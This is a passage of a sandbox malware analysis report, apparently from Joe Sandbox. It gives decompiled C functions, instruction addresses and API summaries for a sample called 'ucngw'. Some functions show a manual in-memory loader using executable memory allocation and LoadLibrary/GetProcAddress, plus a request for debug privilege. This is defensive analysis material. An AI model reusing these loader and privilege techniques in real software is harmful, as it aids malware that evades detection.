										_v8 = 3;
										 *_t87 = 0x20;
										 *((intOrPtr*)(_t87 + 4)) = _t58;
										 *((intOrPtr*)(_t87 + 8)) = _v56;
										 *((intOrPtr*)(_t87 + 0xc)) = _v52;
										 *((intOrPtr*)(_t87 + 0x10)) = _v36;
										 *((intOrPtr*)(_t87 + 0x14)) = _v196;
										 *((intOrPtr*)(_t87 + 0x18)) = _v48;
										 *((intOrPtr*)(_t87 + 0x1c)) = _v44;
										_v8 = 2;
									}
									_v384 = 1;
									E00C53CC0(_t89, 0xc6a004,  &_v20, 0xfffffffe);
								}
							}
						}
					}
				} else {
					L1:
					E00C53CC0(_t89, 0xc6a004,  &_v20, 0xfffffffe);
				}
				 *[fs:0x0] = _v20;
				_pop(_t85);
				_pop(_t88);
				_pop(_t70);
				return E00C51252(_t70, _v32 ^ _t89, _t85, _t88);
			}








































    0x00c60523
    0x00c60525
    0x00c6052a
    0x00c60535
    0x00c60536
    0x00c6053c
    0x00c60541
    0x00c60544
    0x00c60546
    0x00c6054c
    0x00c60550
    0x00c60556
    0x00c60559
    0x00c6055b
    0x00c6055e
    0x00c60564
    0x00c6056e
    0x00c60575
    0x00c6057c
    0x00c60583
    0x00c6058a
    0x00c60591
    0x00c60598
    0x00c605a6
    0x00c605ab
    0x00c605b2
    0x00c605ce
    0x00c605d4
    0x00c605dd
    0x00000000
    0x00c605df
    0x00c605df
    0x00c605e6
    0x00c605ee
    0x00c605f3
    0x00c605fa
    0x00000000
    0x00c6061e
    0x00c60624
    0x00c6062d
    0x00000000
    0x00c6062f
    0x00c60635
    0x00c6063e
    0x00000000
    0x00c60644
    0x00c60646
    0x00c60648
    0x00c6064f
    0x00c60655
    0x00c6065b
    0x00c60661
    0x00c60667
    0x00c60670
    0x00c60676
    0x00c6067c
    0x00c6067f
    0x00c6067f
    0x00c60686
    0x00c6069b
    0x00c606a3
    0x00c6063e
    0x00c6062d
    0x00c605fa
    0x00c605b4
    0x00c605b4
    0x00c605bf
    0x00c605c7
    0x00c6076a
    0x00c60772
    0x00c60773
    0x00c60774
    0x00c60782

    APIs
      • Part of subcall function 00C60CD0: VirtualAlloc.KERNELBASE(?,00000000,00003000,00000040,00000000,00C60478,?,?,?,00C605D9), ref: 00C60D26
      • Part of subcall function 00C60CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00C605D9), ref: 00C60D5B
      • Part of subcall function 00C608F0: LoadLibraryA.KERNEL32(?), ref: 00C60939
      • Part of subcall function 00C608F0: GetProcAddress.KERNEL32(?,?,?,?,00C60618), ref: 00C60A06
      • Part of subcall function 00C60830: VirtualProtect.KERNELBASE(?,000000FE,00000040,00C60629,00000000,00C60478,?,?,?,00C60629), ref: 00C608A4
    • @_EH4_CallFilterFunc@8.NTDLLP ref: 00C6069B
    • @_EH4_CallFilterFunc@8.NTDLLP ref: 00C605BF
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 100111D0, Relevance: 3.0, APIs: 2, Instructions: 42
    C-Code - Quality: 75%
    			E100111D0(void* __eflags) {
				char _v12;
				intOrPtr _v20;
				char _v24;
				void* _t7;
				intOrPtr* _t9;
				void* _t17;
				intOrPtr* _t20;

				E10011140(__eflags);
				 *0x1001f2e0 = 0xff;
				 *0x1001f2dc = 0;
				_t7 = LocalAlloc(0x40, 0x1fe);
				 *0x1001f2d8 = _t7;
				_t26 = _t7;
				if(_t7 != 0) {
					RtlAdjustPrivilege(0x14, 1, 0,  &_v12); // executed
					_v24 = 0x1001a7a0;
					_v20 = 7;
					E100120C0( &_v24, _t26);
				}
				_t20 = 0x1001a6e0;
				_t17 = 2;
				do {
					_t9 =  *((intOrPtr*)( *_t20 + 0x18));
					if(_t9 != 0) {
						 *_t9();
					}
					_t20 = _t20 + 4;
					_t17 = _t17 - 1;
				} while (_t17 != 0);
				return 0;
			}










    0x100111db
    0x100111e7
    0x100111f1
    0x100111fb
    0x10011201
    0x10011206
    0x10011208
    0x10011215
    0x1001121f
    0x10011227
    0x1001122f
    0x1001122f
    0x10011234
    0x10011239
    0x10011240
    0x10011242
    0x10011247
    0x10011249
    0x10011249
    0x1001124b
    0x1001124e
    0x1001124e
    0x1001125a

    APIs
      • Part of subcall function 10011140: RtlGetNtVersionNumbers.NTDLL(1001F384,1001F3CC,1001F388), ref: 10011156
    • LocalAlloc.KERNEL32(00000040,000001FE), ref: 100111FB
    • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 10011215
      • Part of subcall function 100120C0: LocalAlloc.KERNEL32(00000040,1001A89C), ref: 100121E0
      • Part of subcall function 100120C0: LocalAlloc.KERNEL32(00000040,?), ref: 1001231C
      • Part of subcall function 100120C0: LocalAlloc.KERNEL32(00000040,?), ref: 1001239F
      • Part of subcall function 100120C0: LocalAlloc.KERNEL32(00000040,?), ref: 10012425
      • Part of subcall function 100120C0: LocalAlloc.KERNEL32(00000040,?), ref: 100124C0
      • Part of subcall function 100120C0: LocalFree.KERNEL32(00000000,?,?), ref: 100124FF
      • Part of subcall function 100120C0: LocalFree.KERNEL32(00000000,?,?), ref: 10012511
      • Part of subcall function 100120C0: LocalFree.KERNEL32(00000000,?,?), ref: 10012526
      • Part of subcall function 100120C0: LocalFree.KERNEL32(?,?,?), ref: 10012538
      • Part of subcall function 100120C0: LocalFree.KERNEL32(?), ref: 10012556
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C59025, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 100%
    			E00C59025(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E00C58FEE(_t19) - _t19 >> 1) + (E00C58FEE(_t19) - _t19 >> 1);
					_t6 = E00C561AB(_t14, (E00C58FEE(_t19) - _t19 >> 1) + (E00C58FEE(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E00C5DF30(_t18, _t19, _t12);
					}
					E00C56171(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







    0x00c59025
    0x00c5902f
    0x00c59033
    0x00c59044
    0x00c59048
    0x00c5904d
    0x00c59053
    0x00c59058
    0x00c5905d
    0x00c59062
    0x00c59069
    0x00c59035
    0x00c59035
    0x00c59035
    0x00c59074

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 00C59029
      • Part of subcall function 00C561AB: RtlAllocateHeap.NTDLL(00000000,00C51FCA,?,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA,?,?,?,?), ref: 00C561DD
      • Part of subcall function 00C56171: HeapFree.KERNEL32(00000000,00000000), ref: 00C56187
      • Part of subcall function 00C56171: GetLastError.KERNEL32(?,?,00C59953,?,00000000,?,00000000,?,00C5997A,?,00000007,?,?,00C59DDC,?,?), ref: 00C56199
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C59069
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C619C0, Relevance: 3.0, APIs: 2, Instructions: 25
    C-Code - Quality: 100%
    			E00C619C0(long __ecx, void** __edx) {
				void* _t4;
				void* _t8;
				void** _t9;

				_t8 = __ecx;
				_t9 = __edx;
				if(__ecx == 0 || __edx == 0) {
					L4:
					return 0;
				} else {
					_t4 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
					if(_t4 == 0) {
						goto L4;
					} else {
						_t9[1] = _t8;
						 *_t9 = _t4;
						return 1;
					}
				}
			}






    0x00c619c2
    0x00c619c4
    0x00c619c8
    0x00c619f0
    0x00c619f3
    0x00c619ce
    0x00c619d8
    0x00c619e0
    0x00000000
    0x00c619e2
    0x00c619e2
    0x00c619e5
    0x00c619ee
    0x00c619ee
    0x00c619e0

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00C61C58), ref: 00C619D1
    • RtlAllocateHeap.NTDLL(00000000), ref: 00C619D8
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C60CD0, Relevance: 2.6, APIs: 2, Instructions: 70
    C-Code - Quality: 96%
    			E00C60CD0(intOrPtr __ecx) {
				intOrPtr _v8;
				signed int _t16;
				void* _t19;
				void* _t22;
				intOrPtr _t25;
				intOrPtr _t28;
				signed int _t31;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t40;
				void* _t44;
				long _t45;

				_push(__ecx);
				_t28 = __ecx;
				_t40 = 0;
				_v8 = __ecx;
				_t16 =  *(__ecx + 0x46) & 0x0000ffff;
				_t44 = 0;
				_t33 =  *((intOrPtr*)(__ecx + 0x138));
				if(0 < _t16) {
					_t36 = _t33 + 0xc;
					_t31 = _t16;
					do {
						_t38 =  *((intOrPtr*)(_t36 - 4));
						if(_t38 != 0) {
							_t25 =  *_t36;
							_t40 =  <  ? _t25 : _t40;
							_t44 =  >  ? _t25 + _t38 : _t44;
						}
						_t36 = _t36 + 0x28;
						_t31 = _t31 - 1;
					} while (_t31 != 0);
					_t28 = _v8;
				}
				_t6 = _t28 + 0x74; // 0x6c70000
				_t45 = _t44 - _t40;
				_t19 = VirtualAlloc( *_t6 + _t40, _t45, 0x3000, 0x40);
				_t7 = _t28 + 0x74; // 0x6c70000
				 *(_t28 + 0x148) = _t19;
				 *((intOrPtr*)(_t28 + 0x144)) =  *_t7;
				if(_t19 != 0) {
					L10:
					_t21 =  ==  ? 3 : 0;
					return  ==  ? 3 : 0;
				} else {
					if(( *(_t28 + 0x56) & 0x00000001) == 0) {
						_t22 = VirtualAlloc(0, _t45, 0x3000, 0x40);
						 *(_t28 + 0x148) = _t22;
						 *((intOrPtr*)(_t28 + 0x144)) = _t22 - _t40;
						goto L10;
					} else {
						return 4;
					}
				}
			}
















    0x00c60cd3
    0x00c60cd5
    0x00c60cdb
    0x00c60cdd
    0x00c60ce0
    0x00c60ce4
    0x00c60ce6
    0x00c60cef
    0x00c60cf1
    0x00c60cf4
    0x00c60cf6
    0x00c60cf6
    0x00c60cfb
    0x00c60cfd
    0x00c60d01
    0x00c60d08
    0x00c60d08
    0x00c60d0b
    0x00c60d0e
    0x00c60d0e
    0x00c60d13
    0x00c60d13
    0x00c60d16
    0x00c60d19
    0x00c60d26
    0x00c60d2c
    0x00c60d2f
    0x00c60d35
    0x00c60d3d
    0x00c60d6f
    0x00c60d7e
    0x00c60d85
    0x00c60d3f
    0x00c60d43
    0x00c60d5b
    0x00c60d61
    0x00c60d69
    0x00000000
    0x00c60d45
    0x00c60d50
    0x00c60d50
    0x00c60d43

    APIs
    • VirtualAlloc.KERNELBASE(?,00000000,00003000,00000040,00000000,00C60478,?,?,?,00C605D9), ref: 00C60D26
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00C605D9), ref: 00C60D5B
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C51359, Relevance: 1.6, APIs: 1, Instructions: 101
    C-Code - Quality: 72%
    			E00C51359(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, void* __esi) {
				void* _t10;
				intOrPtr _t12;
				void* _t20;
				void* _t27;
				void* _t29;
				void* _t31;
				char _t35;
				void* _t36;
				intOrPtr* _t40;
				void* _t44;
				intOrPtr* _t51;
				intOrPtr* _t52;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;

				_t48 = __edi;
				_t47 = __edx;
				_t36 = __ecx;
				E00C51CA0(__ebx, __edi, __esi, 0xc689e8, 0x14);
				_t10 = E00C51750(_t36, __edx, 1); // executed
				if(_t10 != 0) {
					L2:
					_t35 = 0;
					 *((char*)(_t55 - 0x19)) = 0;
					 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
					 *((char*)(_t55 - 0x24)) = E00C5171B();
					_t12 =  *0xc6acc4; // 0x2
					if(_t12 == 1) {
						goto L1;
					}
					if(_t12 != 0) {
						_t35 = 1;
						 *((char*)(_t55 - 0x19)) = 1;
						L8:
						E00C518AA( *((intOrPtr*)(_t55 - 0x24)));
						_pop(_t40);
						_t51 = E00C51A48();
						if( *_t51 != 0) {
							_t29 = E00C51820(_t35, 0, _t51);
							_t40 = _t51;
							if(_t29 != 0) {
								_t54 =  *_t51;
								_t40 = _t54;
								L00C51C94();
								 *_t54(0, 2, 0);
							}
						}
						_t52 = E00C51A4E();
						if( *_t52 != 0) {
							_t27 = E00C51820(_t35, 0, _t52);
							_t40 = _t52;
							if(_t27 != 0) {
								E00C559D9(_t35, _t47, 0, _t52,  *_t52);
								_pop(_t40);
							}
						}
						_push(E00C51B6F() & 0x0000ffff);
						_push(E00C556D8());
						_push(0);
						_push(0xc50000); // executed
						_t20 = E00C61EC0(); // executed
						_t53 = _t20;
						if(E00C51BA5() == 0) {
							E00C55A11(_t53); // executed
						}
						if(_t35 == 0) {
							E00C559B4();
						}
						E00C518C7(_t40, 1, 0);
						 *(_t55 - 4) = 0xfffffffe;
						L19:
						return E00C51CE6();
					}
					 *0xc6acc4 = 1;
					_t31 = E00C5577A(1, 0xc63158, 0xc63170); // executed
					_pop(_t44);
					if(_t31 == 0) {
						E00C5571E(_t44, 0xc6314c, 0xc63154); // executed
						 *0xc6acc4 = 2;
						goto L8;
					} else {
						 *(_t55 - 4) = 0xfffffffe;
						goto L19;
					}
				}
				L1:
				E00C51A54(_t47, _t48, 7);
				goto L2;
			}


















    0x00c51359
    0x00c51359
    0x00c51359
    0x00c51360
    0x00c51367
    0x00c5136f
    0x00c51378
    0x00c51378
    0x00c5137a
    0x00c5137d
    0x00c51386
    0x00c51389
    0x00c51393
    0x00000000
    0x00000000
    0x00c51397
    0x00c513e2
    0x00c513e4
    0x00c513e7
    0x00c513ea
    0x00c513ef
    0x00c513f5
    0x00c513fb
    0x00c513fe
    0x00c51403
    0x00c51406
    0x00c5140c
    0x00c5140e
    0x00c51410
    0x00c51415
    0x00c51415
    0x00c51406
    0x00c5141c
    0x00c51420
    0x00c51423
    0x00c51428
    0x00c5142b
    0x00c5142f
    0x00c51434
    0x00c51434
    0x00c5142b
    0x00c5143d
    0x00c51443
    0x00c51444
    0x00c51445
    0x00c5144a
    0x00c5144f
    0x00c51458
    0x00c5145b
    0x00c5145b
    0x00c51462
    0x00c51464
    0x00c51464
    0x00c5146c
    0x00c51473
    0x00c514bb
    0x00c514c0
    0x00c514c0
    0x00c51399
    0x00c513a9
    0x00c513af
    0x00c513b2
    0x00c513cf
    0x00c513d6
    0x00000000
    0x00c513b4
    0x00c513b4
    0x00000000
    0x00c513bb
    0x00c513b2
    0x00c51371
    0x00c51373
    0x00000000

    APIs
      • Part of subcall function 00C51A54: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C51A61
      • Part of subcall function 00C51A54: IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 00C51B29
      • Part of subcall function 00C51A54: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C51B48
      • Part of subcall function 00C51A54: UnhandledExceptionFilter.KERNEL32(?), ref: 00C51B52
    • ___scrt_get_show_window_mode.LIBCMT ref: 00C51435
      • Part of subcall function 00C51B6F: GetStartupInfoW.KERNEL32(?), ref: 00C51B89
      • Part of subcall function 00C61EC0: GetCommandLineW.KERNEL32 ref: 00C61EDF
      • Part of subcall function 00C61EC0: CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00C61EF3
      • Part of subcall function 00C61EC0: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00C62036
      • Part of subcall function 00C61EC0: WriteFile.KERNEL32(00000000,<NULL>,?,?,00000000), ref: 00C62074
      • Part of subcall function 00C61EC0: CloseHandle.KERNEL32(00000000), ref: 00C6207B
      • Part of subcall function 00C51BA5: GetModuleHandleW.KERNEL32(00000000,00C557EA,00C68D08,0000000C,00C559D4,00000003,00000002,00000000,?,00C5623B,00000003,00C58023), ref: 00C51BA7
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C53EA6, Relevance: 1.6, APIs: 1, Instructions: 66library
    C-Code - Quality: 88%
    			E00C53EA6(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t34;
				intOrPtr* _t35;

				_t20 = 0xc6ad64 + _a4 * 4;
				asm("lock cmpxchg [ebx], ecx");
				_t28 =  *0xc6a004; // 0x26d30358
				_t30 = _t29 | 0xffffffff;
				_t34 = _t28 ^ 0;
				asm("ror esi, cl");
				if(_t34 == _t30) {
					L14:
					return 0;
				}
				if(_t34 == 0) {
					_t35 = _a12;
					if(_t35 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t30 ^ _t28;
							goto L14;
						}
						_t34 = GetProcAddress(_t13, _a8);
						if(_t34 == 0) {
							_t28 =  *0xc6a004; // 0x26d30358
							goto L13;
						}
						 *_t20 = E00C53E89(_t34);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00C53F46( *_t35); // executed
						if(_t13 != 0) {
							break;
						}
						_t35 = _t35 + 4;
						if(_t35 != _a16) {
							continue;
						}
						_t28 =  *0xc6a004; // 0x26d30358
						goto L7;
					}
					_t28 =  *0xc6a004; // 0x26d30358
					goto L8;
				}
				L2:
				return _t34;
			}










    0x00c53eb1
    0x00c53eba
    0x00c53ebe
    0x00c53ec4
    0x00c53ece
    0x00c53ed0
    0x00c53ed4
    0x00c53f3f
    0x00000000
    0x00c53f3f
    0x00c53ed8
    0x00c53ede
    0x00c53ee4
    0x00c53f00
    0x00c53f00
    0x00c53f02
    0x00c53f04
    0x00c53f2f
    0x00c53f31
    0x00c53f39
    0x00c53f3d
    0x00000000
    0x00c53f3d
    0x00c53f10
    0x00c53f14
    0x00c53f29
    0x00000000
    0x00c53f29
    0x00c53f1d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00c53ee6
    0x00c53ee6
    0x00c53ee8
    0x00c53ef0
    0x00000000
    0x00000000
    0x00c53ef2
    0x00c53ef8
    0x00000000
    0x00000000
    0x00c53efa
    0x00000000
    0x00c53efa
    0x00c53f21
    0x00000000
    0x00c53f21
    0x00c53eda
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000,?,00C53E34,00C6AD38,00000FA0), ref: 00C53F0A
      • Part of subcall function 00C53F46: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00C6AD38,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx), ref: 00C53F7E
      • Part of subcall function 00C53F46: GetLastError.KERNEL32(?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000,?,00C53E34), ref: 00C53F8A
      • Part of subcall function 00C53F46: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx), ref: 00C53F98
      • Part of subcall function 00C53F46: FreeLibrary.KERNEL32(00000000,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000), ref: 00C53FBA
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 100022EB, Relevance: 1.6, APIs: 1, Instructions: 66library
    C-Code - Quality: 88%
    			E100022EB(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t34;
				intOrPtr* _t35;

				_t20 = 0x1001ebd0 + _a4 * 4;
				asm("lock cmpxchg [ebx], ecx");
				_t28 =  *0x1001d018; // 0x26c1db24
				_t30 = _t29 | 0xffffffff;
				_t34 = _t28 ^ 0;
				asm("ror esi, cl");
				if(_t34 == _t30) {
					L14:
					return 0;
				}
				if(_t34 == 0) {
					_t35 = _a12;
					if(_t35 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t30 ^ _t28;
							goto L14;
						}
						_t34 = GetProcAddress(_t13, _a8);
						if(_t34 == 0) {
							_t28 =  *0x1001d018; // 0x26c1db24
							goto L13;
						}
						 *_t20 = E10001371(_t34);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E1000238B( *_t35); // executed
						if(_t13 != 0) {
							break;
						}
						_t35 = _t35 + 4;
						if(_t35 != _a16) {
							continue;
						}
						_t28 =  *0x1001d018; // 0x26c1db24
						goto L7;
					}
					_t28 =  *0x1001d018; // 0x26c1db24
					goto L8;
				}
				L2:
				return _t34;
			}










    0x100022f6
    0x100022ff
    0x10002303
    0x10002309
    0x10002313
    0x10002315
    0x10002319
    0x10002384
    0x00000000
    0x10002384
    0x1000231d
    0x10002323
    0x10002329
    0x10002345
    0x10002345
    0x10002347
    0x10002349
    0x10002374
    0x10002376
    0x1000237e
    0x10002382
    0x00000000
    0x10002382
    0x10002355
    0x10002359
    0x1000236e
    0x00000000
    0x1000236e
    0x10002362
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x1000232b
    0x1000232b
    0x1000232d
    0x10002335
    0x00000000
    0x00000000
    0x10002337
    0x1000233d
    0x00000000
    0x00000000
    0x1000233f
    0x00000000
    0x1000233f
    0x10002366
    0x00000000
    0x10002366
    0x1000231f
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000,?,10002275,00000005,10001E69), ref: 1000234F
      • Part of subcall function 1000238B: LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000001,?,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree), ref: 100023C3
      • Part of subcall function 1000238B: GetLastError.KERNEL32(?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000,?,10002275,00000005), ref: 100023CF
      • Part of subcall function 1000238B: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000), ref: 100023DD
      • Part of subcall function 1000238B: FreeLibrary.KERNEL32(00000000,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000,?,10002275), ref: 100023FF
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C59075, Relevance: 1.6, APIs: 1, Instructions: 65library
    C-Code - Quality: 90%
    			E00C59075(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xc6b408 + _a4 * 4;
				_t27 =  *0xc6a004; // 0x26d30358
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xc6a004; // 0x26d30358
							goto L13;
						}
						 *_t20 = E00C53E89(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00C59111( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xc6a004; // 0x26d30358
						goto L7;
					}
					_t27 =  *0xc6a004; // 0x26d30358
					goto L8;
				}
				L2:
				return _t33;
			}










    0x00c59080
    0x00c59089
    0x00c5908f
    0x00c59099
    0x00c5909b
    0x00c5909f
    0x00c5910a
    0x00000000
    0x00c5910a
    0x00c590a3
    0x00c590a9
    0x00c590af
    0x00c590cb
    0x00c590cb
    0x00c590cd
    0x00c590cf
    0x00c590fa
    0x00c590fc
    0x00c59104
    0x00c59108
    0x00000000
    0x00c59108
    0x00c590db
    0x00c590df
    0x00c590f4
    0x00000000
    0x00c590f4
    0x00c590e8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00c590b1
    0x00c590b1
    0x00c590b3
    0x00c590bb
    0x00000000
    0x00000000
    0x00c590bd
    0x00c590c3
    0x00000000
    0x00000000
    0x00c590c5
    0x00000000
    0x00c590c5
    0x00c590ec
    0x00000000
    0x00c590ec
    0x00c590a5
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072,00000000), ref: 00C590D5
      • Part of subcall function 00C59111: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue), ref: 00C59143
      • Part of subcall function 00C59111: GetLastError.KERNEL32(?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072), ref: 00C5914F
      • Part of subcall function 00C59111: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000), ref: 00C5915D
      • Part of subcall function 00C59111: FreeLibrary.KERNEL32(00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364), ref: 00C5917F
    Memory Dump Source
